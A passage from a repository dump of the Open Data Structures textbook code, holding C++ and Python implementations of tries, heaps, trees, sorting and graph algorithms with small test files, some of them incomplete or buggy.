"content_id": "dc34dd77343f1f0d0ca68fc1432e665e277ae00c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1000,
"license_type": "no_license",
"max_line_length": 113,
"num_lines": 39,
"path": "/opendatastructures.org/cpp/BinarySearchTree.cpp",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "/*\r\n * BinarySearchTree.cpp\r\n *\r\n * Created on: 2011-11-28\r\n * Author: morin\r\n */\r\n\r\n#include \"BinarySearchTree.h\"\r\n#include \"utils.h\"\r\nnamespace ods {\r\n\r\n/**\r\n * Todo: Do this for other classes and/or move this up into BinarySearchTree<Node,T>\r\n */\r\ntemplate<>\r\nBinarySearchTree1<int>::BinarySearchTree1() : BinarySearchTree<BSTNode1<int>, int>(INT_MIN) {\r\n}\r\n\r\ntemplate<>\r\nBinarySearchTree1<long>::BinarySearchTree1() : BinarySearchTree<BSTNode1<long>, long>(LONG_MIN) {\r\n}\r\n\r\ntemplate<>\r\nBinarySearchTree1<long long>::BinarySearchTree1() : BinarySearchTree<BSTNode1<long long>, long long>(LLONG_MIN) {\r\n}\r\n\r\ntemplate<>\r\nBinarySearchTree1<double>::BinarySearchTree1() : BinarySearchTree<BSTNode1<double>, double>(NAN) {\r\n}\r\n\r\ntemplate<>\r\nBinarySearchTree1<float>::BinarySearchTree1() : BinarySearchTree<BSTNode1<float>, float>(NAN) {\r\n}\r\n\r\ntemplate class BinarySearchTree1<int>;\r\ntemplate class BinarySearchTree1<double>;\r\n// template class BinarySearchTree1<dodo>;\r\n\r\n} /* namespace ods */\r\n"
},
{
"alpha_fraction": 0.52073734998703,
"alphanum_fraction": 0.557603657245636,
"avg_line_length": 11.5625,
"blob_id": "580fe393cfd0c52712ce14fc3ab1a7655e6fa027",
"content_id": "6e7549a7928d6a2ee867a7525bcb62df95f4f08b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 217,
"license_type": "no_license",
"max_line_length": 32,
"num_lines": 16,
"path": "/opendatastructures.org/cpp/DLList.cpp",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "/*\r\n * DLList.cpp\r\n *\r\n * Created on: 2011-11-24\r\n * Author: morin\r\n */\r\n\r\n#include \"DLList.h\"\r\n\r\nnamespace ods {\r\n\r\n\r\ntemplate DLList<int>::DLList();\r\ntemplate DLList<int>::~DLList();\r\n\r\n} /* namespace ods */\r\n"
},
{
"alpha_fraction": 0.4740259647369385,
"alphanum_fraction": 0.5259740352630615,
"avg_line_length": 9.84615421295166,
"blob_id": "4485ae93b32b8e53e7aeb16f830a75567314eb93",
"content_id": "91850bf33e7835d4847235a418ae5c205bc867f4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 154,
"license_type": "no_license",
"max_line_length": 26,
"num_lines": 13,
"path": "/opendatastructures.org/cpp/XFastTrie.cpp",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "/*\r\n * XFastTrie.cpp\r\n *\r\n * Created on: 2012-01-26\r\n * Author: morin\r\n */\r\n\r\n#include \"XFastTrie.h\"\r\n\r\nnamespace ods {\r\n\r\n\r\n} /* namespace ods */\r\n"
},
{
"alpha_fraction": 0.7196261882781982,
"alphanum_fraction": 0.7196261882781982,
"avg_line_length": 19.399999618530273,
"blob_id": "7ed069de61837be6b058cff500c3d5fd1ac252e0",
"content_id": "5974077c5f1ed4f90aa53ddee147060a6ed7e3e6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 107,
"license_type": "no_license",
"max_line_length": 40,
"num_lines": 5,
"path": "/opendatastructures.org/python/ods/tests/test_chainedhashtable.py",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "from settest import exercise_set\r\nimport ods\r\n\r\ndef test_cht():\r\n exercise_set(ods.ChainedHashTable())\r\n"
},
{
"alpha_fraction": 0.707317054271698,
"alphanum_fraction": 0.707317054271698,
"avg_line_length": 15,
"blob_id": "bc44a29668f44186d1227f963546d9712748b926",
"content_id": "8e3d057aeb2c019d3fe09bbba4351758177c333a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 123,
"license_type": "no_license",
"max_line_length": 34,
"num_lines": 7,
"path": "/opendatastructures.org/python/ods/tests/test_meldableheap.py",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "import random\r\n\r\nimport ods\r\nfrom heaptest import exercise_heap\r\n\r\ndef test_mh():\r\n\texercise_heap(ods.MeldableHeap())\r\n\r\n\r\n"
},
{
"alpha_fraction": 0.8167575001716614,
"alphanum_fraction": 0.8167575001716614,
"avg_line_length": 26.705883026123047,
"blob_id": "2a72d6b8a2c1d7ef091d63b768a3b33bb69c5c23",
"content_id": "dde5526fa9082f6910f0ffa30493514eee4fe667",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1468,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 51,
"path": "/opendatastructures.org/python/ods/__init__.py",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "# Array-based lists\r\nfrom arraydeque import ArrayDeque\r\nfrom arrayqueue import ArrayQueue\r\nfrom arraystack import ArrayStack\r\nfrom fastarraystack import FastArrayStack\r\nfrom dualarraydeque import DualArrayDeque\r\nfrom rootisharraystack import RootishArrayStack\r\n\r\n# Linked lists\r\nfrom sllist import SLList\r\nfrom dllist import DLList\r\nfrom selist import SEList\r\nfrom skiplistlist import SkiplistList\r\n\r\n# Hash tables\r\nfrom chainedhashtable import ChainedHashTable\r\nfrom linearhashtable import LinearHashTable\r\n\r\n# Binary tree\r\nfrom binarytree import BinaryTree\r\n\r\n# Comparison-based SSets\r\nfrom skiplistsset import SkiplistSSet\r\nfrom binarysearchtree import BinarySearchTree\r\nfrom redblacktree import RedBlackTree\r\nfrom scapegoattree import ScapegoatTree\r\nfrom treap import Treap\r\n\r\n# Priority queues\r\nfrom binaryheap import BinaryHeap\r\nfrom meldableheap import MeldableHeap\r\n\r\n# Dumb as a bag of hammers data structures used for testing\r\nfrom controllist import ControlList\r\nfrom controlsset import ControlSSet\r\n\r\n# Sorting algorithms\r\nfrom algorithms import merge_sort, quick_sort, heap_sort, \\\r\n counting_sort, radix_sort\r\n\r\n# Graphs\r\nfrom adjacencymatrix import AdjacencyMatrix\r\nfrom adjacencylists import AdjacencyLists\r\n\r\n# Integer data structures\r\nfrom binarytrie import BinaryTrie\r\nfrom xfasttrie import XFastTrie\r\nfrom yfasttrie import YFastTrie\r\n\r\n# External memory data structures\r\nfrom btree import BTree, BlockStore # fixme, don't need blockstore\r\n\r\n\r\n"
},
{
"alpha_fraction": 0.5548450350761414,
"alphanum_fraction": 0.5725528597831726,
"avg_line_length": 16.824073791503906,
"blob_id": "1d38df2cf9e82b0413044d369bd9d4c7923f0f3a",
"content_id": "7c1945fa9bbe5a0246579275d563e7d3dffcda0d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 2033,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 108,
"path": "/opendatastructures.org/cpp/YFastTrie.h",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "/*\r\n * YFastTrie.h\r\n *\r\n * Created on: 2012-01-27\r\n * Author: morin\r\n */\r\n\r\n#ifndef YFASTTRIE_H_\r\n#define YFASTTRIE_H_\r\n\r\n#include \"Treap.h\"\r\n#include \"XFastTrie.h\"\r\n\r\nnamespace ods {\r\n\r\n\r\n/**\r\n * Warning YFastTrie depends on XFastTrie, so you can't use it to store\r\n * the values UINT_MAX-1 or UINT_MAX-2\r\n */\r\ntemplate<class T>\r\nclass YPair {\r\npublic:\r\n\tunsigned ix;\r\n\tTreap1<T> *t;\r\n\tYPair(unsigned ix0, Treap1<T> *t0) { ix = ix0; t = t0; }\r\n\tYPair(unsigned ix0) { ix = ix0; }\r\n\tYPair() { }\r\n};\r\n\r\n\r\ntemplate<class T>\r\nunsigned intValue(const YPair<T> &p) {\r\n\treturn p.ix;\r\n}\r\n\r\n\r\ntemplate<class T>\r\nclass YFastTrie {\r\n\tstatic const int w = 32; // FIXME portability\r\n\tXFastTrie1<YPair<T> > xft;\r\n\tint n;\r\npublic:\r\n\tYFastTrie();\r\n\tvirtual ~YFastTrie();\r\n\tT find(T x);\r\n\tbool add(T x);\r\n\tbool remove(T x);\r\n\tint size() { return n; }\r\n\tvoid clear() {} ;\r\n};\r\n\r\ntemplate<class T>\r\nYFastTrie<T>::YFastTrie() : xft() {\r\n\txft.add(YPair<T>(UINT_MAX, new Treap1<T>()));\r\n\tn = 0;\r\n}\r\n\r\ntemplate<class T>\r\nYFastTrie<T>::~YFastTrie() {\r\n/* FIXME: Need to iterate over the YFastTrie elements\r\n\tXFastTrieNode1<YPair<T> > *u = xft.dummy.next;\r\n\twhile (u != &xft.dummy) {\r\n\t\tdelete u->x.t;\r\n\t\tu = u->next;\r\n\t}\r\n*/\r\n\txft.clear();\r\n\tn = 0;\r\n}\r\n\r\ntemplate<class T>\r\nT YFastTrie<T>::find(T x) {\r\n\treturn xft.find(YPair<T>(intValue(x))).t->find(x);\r\n}\r\n\r\ntemplate<class T>\r\nbool YFastTrie<T>::add(T x) {\r\n\tunsigned ix = intValue(x);\r\n\tTreap1<T> *t = xft.find(YPair<T>(ix)).t;\r\n\tif (t->add(x)) {\r\n\t\tn++;\r\n\t\tif (rand() % w == 0) {\r\n\t\t\tTreap1<T> *t1 = (Treap1<T>*)t->split(x);\r\n\t\t\txft.add(YPair<T>(ix, t1));\r\n\t\t}\r\n\t\treturn true;\r\n\t}\r\n\treturn false;\r\n\treturn true;\r\n}\r\n\r\ntemplate<class T>\r\nbool YFastTrie<T>::remove(T x) {\r\n\tunsigned ix = intValue(x);\r\n\tXFastTrieNode1<YPair<T> > *u = xft.findNode(ix);\r\n\tbool ret = u->x.t->remove(x);\r\n\tif (ret) n--;\r\n\tif (u->x.ix == ix && ix != UINT_MAX) {\r\n\t\tTreap1<T> *t2 = u->child[1]->x.t;\r\n\t\tt2->absorb(*u->x.t);\r\n\t\txft.remove(u->x);\r\n\t}\r\n\treturn ret;\r\n}\r\n\r\n} /* namespace ods */\r\n#endif /* YFASTTRIE_H_ */\r\n"
},
{
"alpha_fraction": 0.3621252477169037,
"alphanum_fraction": 0.3885425925254822,
"avg_line_length": 20.51677894592285,
"blob_id": "c27992b7eb5895c0075cb2e6efc8a66844d5399e",
"content_id": "956af0e3897c25c8806baabe19fb3d18d344710f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3369,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 149,
"path": "/opendatastructures.org/python/ods/algorithms.py",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "\"\"\"Implementations of some sorting and graph algorithms\"\"\"\r\nimport random\r\nfrom utils import new_zero_array, new_array, _new_array, w\r\nfrom binaryheap import BinaryHeap\r\n\r\ndef average(a):\r\n s = 0\r\n for i in range(len(a)):\r\n s += a[i]\r\n return s/len(a)\r\n\r\ndef left_shift_a(a):\r\n for i in range(len(a)-1):\r\n a[i] = a[i+1]\r\n a[len(a)-1] = None\r\n\r\ndef left_shift_b(a):\r\n a[0:len(a)-1] = a[1:len(a)]\r\n a[len(a)-1] = None\r\n\r\ndef zero(a):\r\n a[0:len(a)] = 0\r\n\r\ndef merge_sort(a):\r\n if len(a) <= 1:\r\n return a\r\n m = len(a)//2\r\n a0 = merge_sort(a[:m])\r\n a1 = merge_sort(a[m:])\r\n merge(a0, a1, a)\r\n return a\r\n\r\ndef merge(a0, a1, a):\r\n i0 = i1 = 0\r\n for i in range(len(a)):\r\n if i0 == len(a0):\r\n a[i] = a1[i1]\r\n i1 += 1\r\n elif i1 == len(a1):\r\n a[i] = a0[i0]\r\n i0 += 1\r\n elif a0[i0] <= a1[i1]:\r\n a[i] = a0[i0]\r\n i0 += 1\r\n else:\r\n a[i] = a1[i1]\r\n i1 += 1\r\n\r\n_random_int = random.randrange\r\n\r\ndef quick_sort(a):\r\n _quick_sort(a, 0, len(a))\r\n\r\ndef _quick_sort(a, i, n):\r\n if n <= 1: return\r\n x = a[i + _random_int(n)]\r\n (p, j, q) = (i-1, i, i+n)\r\n while j < q:\r\n if a[j] < x:\r\n p += 1\r\n a[j], a[p] = a[p], a[j]\r\n j += 1\r\n elif a[j] > x:\r\n q -= 1\r\n a[j], a[q] = a[q], a[j]\r\n else:\r\n j += 1\r\n _quick_sort(a, i, p-i+1)\r\n _quick_sort(a, q, n-(q-i))\r\n\r\ndef heap_sort(a):\r\n h = BinaryHeap()\r\n h.a = a\r\n h.n = len(a)\r\n m = h.n//2\r\n for i in range(m-1, -1, -1):\r\n h.trickle_down(i)\r\n while h.n > 1:\r\n h.n -= 1\r\n h.a[h.n], h.a[0] = h.a[0], h.a[h.n]\r\n h.trickle_down(0)\r\n a.reverse()\r\n \r\ndef counting_sort(a, k):\r\n c = new_zero_array(k)\r\n for i in range(len(a)):\r\n c[a[i]] += 1 \r\n for i in range(1, k):\r\n c[i] += c[i-1] \r\n b = new_array(len(a))\r\n for i in range(len(a)-1, -1, -1):\r\n c[a[i]] -= 1 \r\n b[c[a[i]]] = a[i] \r\n return b\r\n \r\nd = 8\r\n\r\ndef radix_sort(a):\r\n for p in range(w//d):\r\n c = new_zero_array(1<<d)\r\n b = new_array(len(a))\r\n for i in range(len(a)):\r\n bits = (a[i] >> d*p)&((1<<d)-1) \r\n c[bits] += 1 \r\n for i in range(1, 1<<d):\r\n c[i] += c[i-1]\r\n for i in range(len(a)-1, -1, -1):\r\n bits = (a[i] >> d*p)&((1<<d)-1)\r\n c[bits] -=1\r\n b[c[bits]] = a[i] \r\n a = b\r\n return b\r\n\r\ndef bfs(g, r):\r\n seen = new_boolean_array(n)\r\n q = SLList()\r\n q.add(r)\r\n seen[r] = True\r\n while q.size() > 0:\r\n i = q.remove()\r\n for j in g.out_edges(i):\r\n if seen[j] is False:\r\n q.add(j)\r\n seen[j] = True\r\n\r\nwhite, grey, black = 0, 1, 2\r\n\r\ndef dfs(g, r):\r\n c = new_array(g.n)\r\n _dfs(g, r, c)\r\n \r\ndef _dfs(g, i, c):\r\n c[i] = grey\r\n for j in g.out_edges(i):\r\n if c[j] == white:\r\n c[j] = grey\r\n dfs(g, j, c)\r\n c[i] = black\r\n \r\ndef dfs2(g, r):\r\n c = new_array(g.n)\r\n s = SLList()\r\n s.push(r)\r\n while s.size() > 0:\r\n i = s.pop()\r\n if c[i] == white:\r\n c[i] = grey\r\n for j in g.out_edges(i):\r\n s.push(j)\r\n \r\n\r\n \r\n"
},
{
"alpha_fraction": 0.5441176295280457,
"alphanum_fraction": 0.5563725233078003,
"avg_line_length": 14.319999694824219,
"blob_id": "0ae38ef4eaec978547785fcba808a7008e73dc06",
"content_id": "af35fdf365ffe4aed49b8ffa1698d661c629a872",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 816,
"license_type": "no_license",
"max_line_length": 36,
"num_lines": 50,
"path": "/opendatastructures.org/cpp/AdjacencyMatrix.h",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "/*\r\n * AdjacencyMatrix.h\r\n *\r\n * Created on: 2012-01-13\r\n * Author: morin\r\n */\r\n\r\n#ifndef ADJACENCYMATRIX_H_\r\n#define ADJACENCYMATRIX_H_\r\n\r\nnamespace ods {\r\n\r\nclass AdjacencyMatrix {\r\nprotected:\r\n\tint n;\r\n\tbool **a;\r\npublic:\r\n\tAdjacencyMatrix(int n);\r\n\tvirtual ~AdjacencyMatrix();\r\n\tvoid addEdge(int i, int j) {\r\n\t\ta[i][j] = true;\r\n\t}\r\n\r\n\tvoid removeEdge(int i, int j) {\r\n\t\ta[i][j] = false;\r\n\t}\r\n\r\n\tbool hasEdge(int i, int j) {\r\n\t\treturn a[i][j];\r\n\t}\r\n\r\n\ttemplate<class List>\r\n\tvoid outEdges(int i, List &edges) {\r\n\t\tfor (int j = 0; j < n; j++)\r\n\t\t\tif (a[i][j]) edges.add(j);\r\n\t}\r\n\r\n\ttemplate<class List>\r\n\tvoid inEdges(int i, List &edges) {\r\n\t\tfor (int j = 0; j < n; j++)\r\n\t\t\tif (a[j][i]) edges.add(j);\r\n\t}\r\n\r\n\tint nVertices() {\r\n\t\treturn n;\r\n\t}\r\n};\r\n\r\n} /* namespace ods */\r\n#endif /* ADJACENCYMATRIX_H_ */\r\n"
},
{
"alpha_fraction": 0.48076921701431274,
"alphanum_fraction": 0.5320512652397156,
"avg_line_length": 10,
"blob_id": "b306f10e2d6e7334d4136f58ebf0cfd1544c525b",
"content_id": "f0dda74321d0fca11297290ae54ffa9be24cb7ed",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 156,
"license_type": "no_license",
"max_line_length": 26,
"num_lines": 13,
"path": "/opendatastructures.org/cpp/BinaryTree.cpp",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "/*\r\n * BinaryTree.cpp\r\n *\r\n * Created on: 2011-11-28\r\n * Author: morin\r\n */\r\n\r\n#include \"BinaryTree.h\"\r\n\r\nnamespace ods {\r\n\r\n\r\n} /* namespace ods */\r\n"
},
{
"alpha_fraction": 0.5,
"alphanum_fraction": 0.550632894039154,
"avg_line_length": 11.166666984558105,
"blob_id": "b5cd45a85a910559c9fb17d720e84aebe15db70a",
"content_id": "dfe6d4110e64719aef25f40188a6aa967a14a7e9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 158,
"license_type": "no_license",
"max_line_length": 26,
"num_lines": 12,
"path": "/opendatastructures.org/cpp/MeldableHeap.cpp",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "/*\r\n * MeldableHeap.cpp\r\n *\r\n * Created on: 2011-11-30\r\n * Author: morin\r\n */\r\n\r\n#include \"MeldableHeap.h\"\r\n\r\nnamespace ods {\r\n\r\n} /* namespace ods */\r\n"
},
{
"alpha_fraction": 0.45625001192092896,
"alphanum_fraction": 0.49204546213150024,
"avg_line_length": 20.564102172851562,
"blob_id": "3395137a4a1bf9529108fc4980a12060d9979df9",
"content_id": "2475012fa81579445f71739c6b3575b50a35bb30",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1760,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 78,
"path": "/opendatastructures.org/cpp/FastSqrt.h",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "/*\r\n * FastSqrt.h\r\n *\r\n * Created on: 2011-11-25\r\n * Author: morin\r\n */\r\n\r\n#ifndef FASTSQRT_H_\r\n#define FASTSQRT_H_\r\n\r\nnamespace ods {\r\n\r\nstatic int *sqrtab;\r\nstatic int *logtab;\r\n\r\nclass FastSqrt {\r\nprotected:\r\n\tstatic const int halfint = 1<<16;\r\n\tstatic const int r = 29;\r\n\r\n\t/**\r\n\t * Initialize the logarithm and square root tables\r\n\t */\r\n\tstatic void inittabs(int dummy) {\r\n\t\tsqrtab = new int[halfint];\r\n\t\tlogtab = new int[halfint];\r\n\t\tfor (int d = 0; d < 16; d++)\r\n\t\t\tfor (int k = 0; k < 1<<d; k++)\r\n\t\t\t\tlogtab[(1<<d)+k] = d;\r\n\t\tint s = 1<<7; // sqrt(2^14)\r\n\t\tfor (int i = 0; i < halfint; i++) {\r\n\t\t\tif ((s+1)*(s+1) <= i << 14) s++; // sqrt increases\r\n\t\t\tsqrtab[i] = s;\r\n\t\t}\r\n\t}\r\n\t/* Fake code that appears only in the book\r\n\tvoid inittabs() {\r\n\t\tsqrtab = new int[1<<(r/2)];\r\n\t\tlogtab = new int[1<<(r/2)];\r\n\t\tfor (int d = 0; d < r/2; d++)\r\n\t\t\tfor (int k = 0; k < 1<<d; k++)\r\n\t\t\t\tlogtab[1<<d+k] = d;\r\n\t\tint s = 1<<(r/4); // sqrt(2^(r/2))\r\n\t\tfor (int i = 0; i < 1<<(r/2); i++) {\r\n\t\t\tif ((s+1)*(s+1) <= i << (r/2)) s++; // sqrt increases\r\n\t\t\tsqrtab[i] = s;\r\n\t\t}\r\n\t}\r\n\t*/\r\npublic:\r\n\tstatic void init() { inittabs(0); };\r\n\tstatic int log(int x) {\r\n\t\tif (x >= halfint)\r\n\t\t\treturn 16 + logtab[x>>16];\r\n\t\treturn logtab[x];\r\n\t}\r\n\r\n\tstatic int sqrt(int x) {\r\n\t\tint rp = log(x);\r\n\t\tint upgrade = ((r-rp)/2) * 2;\r\n\t\tint xp = x << upgrade; // xp has r or r-1 bits\r\n\t\tint s = sqrtab[xp>>(r/2)] >> (upgrade/2);\r\n\t\twhile ((s+1)*(s+1) <= x) s++; // executes at most twice\r\n\t\treturn s;\r\n\t}\r\n\r\n\t/* Fake code used only in the book\r\n\tint sqrt(int x, int r) {\r\n\t\tint s = sqrtab[x>>r/2];\r\n\t\twhile ((s+1)*(s+1) <= x) s++; // executes at most twice\r\n\t\treturn s;\r\n\t}\r\n\t*/\r\n\r\n};\r\n\r\n} /* namespace ods */\r\n#endif /* FASTSQRT_H_ */\r\n"
},
{
"alpha_fraction": 0.4357541799545288,
"alphanum_fraction": 0.5474860072135925,
"avg_line_length": 38,
"blob_id": "b0d5dc8975ea014199903a35dfee79334f3de391",
"content_id": "8c8ba407f38c6633743ddc6f8647b6fa6e8f3093",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 358,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 9,
"path": "/opendatastructures.org/python/ods/point3d.py",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "\"\"\"This code doesn't even compile---it's just used as an example\"\"\"\r\n\"\"\"\r\nclass Point3D(object):\r\n def hash_code(self):\r\n z = [0x2058cc50, 0xcb19137e, 0x2cb6b6fd]\r\n zz = 0xbea0107e5067d19d\r\n h = [x0.hash_code(), x1.hash_code(), x2.hash_code()]\r\n return \\ensuremath{(((z[0]*h[0] + z[1]*h[1] + z[2]*h[2])*zz)%(1<<2*w)) >> w}\r\n\"\"\""
},
{
"alpha_fraction": 0.6870229244232178,
"alphanum_fraction": 0.6870229244232178,
"avg_line_length": 16.428571701049805,
"blob_id": "788e0ebe3b637cb3a698b9e254e63ec4809e3e35",
"content_id": "53c5ec155c88f32e1f0067a812f7ed55cf1ff92e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 131,
"license_type": "no_license",
"max_line_length": 34,
"num_lines": 7,
"path": "/opendatastructures.org/python/ods/tests/test_treap.py",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "\r\nfrom nose.tools import *\r\n\r\nimport ods\r\nfrom ssettest import exercise_sset\r\n\r\ndef test_treap():\r\n exercise_sset(ods.Treap())\r\n"
},
{
"alpha_fraction": 0.4147094190120697,
"alphanum_fraction": 0.42430996894836426,
"avg_line_length": 27.084999084472656,
"blob_id": "08519cb7f5939a9dc63b3f613e7e8a4e8a7f96a0",
"content_id": "f1c1f1363d9b4f01d28ea433859ffb0248b268cc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5833,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 200,
"path": "/opendatastructures.org/python/ods/binarytrie.py",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "\"\"\"An implementation of a binary trie for storing w bit integers\r\n\r\nThis structure is able to store elements, x, where int(x) is an unsigned\r\nw bit integer.\r\n\"\"\"\r\n\r\nfrom utils import new_array, w, binfmt\r\nfrom base import BaseSet\r\n\r\n\r\nclass BinaryTrie(BaseSet):\r\n class Node(object):\r\n def __init__(self):\r\n self.child = new_array(2)\r\n self.jump = None\r\n self.parent = None\r\n self.x = None\r\n\r\n @property\r\n def left(self):\r\n return self.child[0]\r\n\r\n @left.setter\r\n def left(self, u):\r\n self.child[0] = u\r\n\r\n @property\r\n def right(self):\r\n return self.child[1]\r\n\r\n @right.setter\r\n def right(self, u):\r\n self.child[1] = u\r\n\r\n @property\r\n def prev(self):\r\n return self.child[0]\r\n\r\n @prev.setter\r\n def prev(self, u):\r\n self.child[0] = u\r\n\r\n @property\r\n def next(self):\r\n return self.child[1]\r\n\r\n @next.setter\r\n def next(self, u):\r\n self.child[1] = u\r\n \r\n def __str__(self):\r\n return \"{\" + str(self.x) + \"}\"\r\n \r\n def _new_node(self):\r\n return BinaryTrie.Node()\r\n \r\n def __init__(self):\r\n super(BinaryTrie, self).__init__()\r\n self._initialize()\r\n \r\n def _initialize(self):\r\n self.dummy = self._new_node()\r\n self.dummy.prev = self.dummy.next = self.dummy\r\n self.r = self._new_node()\r\n self.r.jump = self.dummy\r\n self.n = 0\r\n \r\n def clear(self):\r\n self._initialize()\r\n \r\n def add(self, x):\r\n ix = int(x)\r\n u = self.r\r\n # 1 - search for ix until falling out of the tree\r\n i = 0\r\n while i < w:\r\n c = (ix >> w-i-1) & 1\r\n if u.child[c] is None: break\r\n u = u.child[c]\r\n i += 1\r\n if i == w: return False # already contains x - abort\r\n pred = [u.jump.prev, u.jump][c]\r\n u.jump = None # u will soon have two children\r\n \r\n # 2 - add the path to ix\r\n while i < w:\r\n c = (ix >> w-i-1) & 1\r\n u.child[c] = self._new_node()\r\n u.child[c].parent = u\r\n u = u.child[c]\r\n i += 1\r\n u.x = x\r\n \r\n # 3 - add u to the linked list\r\n u.prev = pred\r\n u.next = pred.next\r\n u.prev.next = u\r\n u.next.prev = u\r\n \r\n # 4 - walk back up, updating jump pointers\r\n v = u.parent\r\n while v is not None:\r\n if (v.left is None \r\n and (v.jump is None or int(v.jump.x) > ix)) \\\r\n or (v.right is None\r\n and (v.jump is None or int(v.jump.x) < ix)):\r\n v.jump = u\r\n v = v.parent\r\n self.n += 1\r\n return True\r\n \r\n def find(self, x):\r\n ix = int(x)\r\n u = self.r\r\n i = 0\r\n while i < w:\r\n c = (ix >> w-i-1) & 1\r\n if u.child[c] is None: break\r\n u = u.child[c]\r\n i += 1\r\n if i == w: return u.x # found it\r\n u = [u.jump, u.jump.next][c]\r\n if u is self.dummy: return None\r\n return u.x\r\n \r\n def remove(self, x):\r\n ix = int(x)\r\n u = self.r\r\n # 1 - find leaf, u, that contains x\r\n i = 0\r\n while i < w:\r\n c = (ix >> w-i-1) & 1\r\n if u.child[c] is None: return False\r\n u = u.child[c]\r\n i += 1\r\n \r\n # 2 - remove u from linked list\r\n u.prev.next = u.next\r\n u.next.prev = u.prev\r\n v = u\r\n \r\n # 3 - delete nodes on path to u\r\n for i in range(w-1, -1, -1):\r\n c = (ix >> w-i-1) & 1\r\n v = v.parent\r\n v.child[c] = None\r\n if v.child[1-c] is not None: break\r\n \r\n # 4 - update jump pointers\r\n pred = u.prev\r\n succ = u.next\r\n v.jump = [pred, succ][v.left is None]\r\n v = v.parent\r\n while v is not None:\r\n if v.jump is u:\r\n v.jump = [pred, succ][v.left is None]\r\n v = v.parent\r\n \r\n self.n -= 1\r\n return True\r\n \r\n def _check(self):\r\n u = self.dummy.next\r\n i = 0\r\n while u is not 
self.dummy:\r\n assert(u.next.prev is u)\r\n u = u.next\r\n i += 1\r\n assert(i == self.n)\r\n self._check_it() \r\n\r\n def _check_it(self, u=None, d=0, prefix=0):\r\n \"\"\"Consistency check of the subtree rooted at u (with depth d)\"\"\"\r\n if u is None: u = self.r\r\n if d == w:\r\n assert(u.x == prefix)\r\n else:\r\n assert(u is self.r or u.left is not None or u.right is not None)\r\n if u.left is None and u.right is not None:\r\n # TODO: check u.jump.x against prefix\r\n val = prefix << w-d-1\r\n assert(u.jump.x is not None)\r\n assert(u.jump.x >> w-d == prefix)\r\n assert(u.jump.x >> w-d-1 == (prefix << 1)|1)\r\n if u.right is None and u.left is not None:\r\n assert(u.jump.x is not None)\r\n assert(u.jump.x >> w-d == prefix)\r\n assert(u.jump.x >> w-d-1 == (prefix << 1))\r\n if u.left is not None and u.right is not None:\r\n assert(u.jump is None)\r\n if u.left is not None:\r\n self._check_it(u.left, d+1, prefix << 1)\r\n if u.right is not None:\r\n self._check_it(u.right, d+1, (prefix << 1) | 1)\r\n \r\n def __iter__(self):\r\n u = self.dummy.next\r\n while u != self.dummy:\r\n yield u.x\r\n u = u.next\r\n \r\n\r\n"
},
{
"alpha_fraction": 0.4340175986289978,
"alphanum_fraction": 0.4692082107067108,
"avg_line_length": 19.0625,
"blob_id": "6c621ef8eb3f9e846d90c83c15c4b9187c9a58e6",
"content_id": "715071d335201a1b24e14f04243188ec09488498",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 341,
"license_type": "no_license",
"max_line_length": 39,
"num_lines": 16,
"path": "/opendatastructures.org/python/ods/tests/heaptest.py",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "import random\r\n\r\n\r\ndef exercise_heap(h=None):\r\n if h is None: return\r\n a0 = []\r\n h\r\n n = 1000\r\n for _ in range(n):\r\n x = random.randrange(5*n)\r\n a0.append(x)\r\n h.add(x)\r\n assert(len(h) == len(a0))\r\n a1 = [h.remove() for _ in range(n)]\r\n assert(sorted(a0) == a1)\r\n assert(len(h) == 0)\r\n\r\n\r\n"
},
{
"alpha_fraction": 0.48140496015548706,
"alphanum_fraction": 0.5103305578231812,
"avg_line_length": 15.285714149475098,
